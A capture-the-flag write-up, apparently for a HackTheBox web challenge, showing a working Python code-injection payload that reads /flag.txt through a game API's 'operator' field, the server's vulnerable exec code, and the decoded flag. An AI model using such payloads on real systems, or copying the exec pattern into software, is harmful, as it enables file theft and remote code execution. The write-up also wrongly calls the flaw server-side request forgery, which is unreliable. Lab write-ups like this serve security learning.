Evaluation Deck

Target Information

  • IP: 157.245.42.104:31254
  • Game application with public API at http://157.245.42.104:31254/api/get_health
    • Can interface with it via curl:
      curl -X POST -H "Content-Type: application/json" -d '{"attack_power":"90","current_health":"100","operator":"+"}' http://157.245.42.104:31254/api/get_health
      
  • Running Docker

Exploitation

  • Opened the application in the Burp Suite proxy and sent a request to the API:

    {
      "attack_power": "90",
      "current_health": "100",
      "operator": "+"
    }
    

    The response was:

    {
      "message": "190"
    }
    

    This means that the API is vulnerable to a server-side request forgery attack.

    The following lines in routes.py show that the API is vulnerable:

    code = compile(f'result = {int(current_health)} {operator} {int(attack_power)}', '<string>', 'exec')
    exec(code, result)
    return response(result.get('result'))
    
  • Attempted to use the API to access the flag on the Docker filesystem:

    {
      "attack_power": "0",
      "current_health": "0",
      "operator": "+ int(''.join([str(ord(x)) for x in list(open('/flag.txt').read())])) +"
    }
    

    The response was:

    {
      "message": 728466123994810051954911010651991164948110115955211451957111451971163333125
    }
    

    I converted this number from the Python ord positions of the flag to ASCII to get the flag:

    HTB{c0d3_1nj3ct10ns_4r3_Gr3at!!}
    

Final Thoughts

A complete write-up of this challenge can be found on Medium, please check it out and show your support by leaving some claps and sharing it with your friends!

The files for this challenge can be found in the assets folder if you would like to try it out for yourself.


Tags

  1. hackthebox (Private)
  2. web (Private)
  3. code-injection (Private)
  4. python (Private)